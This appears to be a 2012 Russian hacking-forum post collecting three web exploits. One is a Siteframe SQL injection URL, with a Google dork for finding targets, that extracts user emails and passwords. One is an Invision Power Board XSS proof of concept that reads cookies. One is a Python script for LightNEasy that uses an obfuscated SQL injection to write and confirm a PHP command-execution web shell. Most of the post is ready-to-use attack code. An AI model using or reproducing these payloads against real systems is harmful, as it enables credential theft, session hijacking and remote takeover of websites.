Тема: [Обзор уязвимостей IPB]
Показать сообщение отдельно

  #8  
Старый 07.04.2012, 15:20
mr.Penguin
Познающий
Регистрация: 08.03.2012
Сообщений: 40
С нами: 7463126

Репутация: 74
По умолчанию
AnGrY BoY/Siteframe 3.2.3 SQL Injection

Код:
# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
# Google Dork: "powered by Siteframe"
# Date: 29/12/2010
# Author: AnGrY BoY
# Software Link: http://sitefrane.org/downloads/
# Version: Siteframe 3.2.3
# Tested on: windows SP2
# CVE : N/A
 
# expolit:
 
# http://localhost/path/user.php?id=[SQL]
 
# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--
 
======================================================================================
# Special Thanks:- all h4kurd members
Vasil A./Invision Power Board 3.2.3 Cross Site Scripting

Код:
Name :  Cross-site scripting vulnerability in Invision Power Board version 3.2.3
Software :  Invision Power Board version 3.2.3
Vendor Homepage :  http://www.invisionpower.com
Vulnerability Type :  Cross-site scripting
Researcher :  Vasil A. xss@9y.com
 
Description
--------------------
Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an
Internet forum software produced by Invision Power Services, Inc. It
is written in PHP and primarily uses MySQL as a database management
system, although support for other database engines is available.
 
Details
--------------------
IP Board is affected by a Cross-site scripting vulnerability in version 3.2.3.
 
Example PoC url is as follows :
 
http://example.com/forums/index.php?showforum=53">with(document)alert(cookie)
 
Additional notes:
1.If a forum contain sub-forums this vulnerability don't exist.
 
2.Most of boards uses "Friendly Url style",but the attack can be
performed  by using "legacy URL style" in the query,e.g :
 
http://example.com/forum/index.php?showforum=2">alert(/xss/.source)
 
instead:
 
http://example.com/forum/index.php?/forum/2-example/
 
Solution
--------------------
The vendor issued patch for this vulnerability. Please see the references.
 
Advisory Timeline
--------------------
10/03/2012 - First contact: Sent the vulnerability details
12/03/2012 - Second contact: Ask for patch
14/03/2012 - Vulnerability Fixed
15/03/2012 - Vulnerability Released
 
Credits
-------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.
AutoSec Tools/LightNEasy 3.2.3 SQL Injection

Код:
# ------------------------------------------------------------------------
# Software................LightNEasy 3.2.3
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.lightneasy.org/
# Discovery Date..........4/21/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch 
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to
# extract arbitrary data. In some environments it may be possible to
# create a PHP shell.
# 
# 
# --PoC--
 
import socket
 
host = 'localhost'
path = '/lne323'
shell_path = '/shell.php'
port = 80
 
def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    
 
    s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 73\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n'
           'Accept: text/html\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="submit"\r\n'
           '\r\n'
           '\r\n'
           '------x--\r\n'
           '\r\n')
 
    resp = s.recv(8192)
 
    http_ok = 'HTTP/1.1 200 OK'
 
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)     
 
    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')
 
    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
    else: print 'shell located at http://' + host + shell_path
 
upload_shell()
 
Ответить с цитированием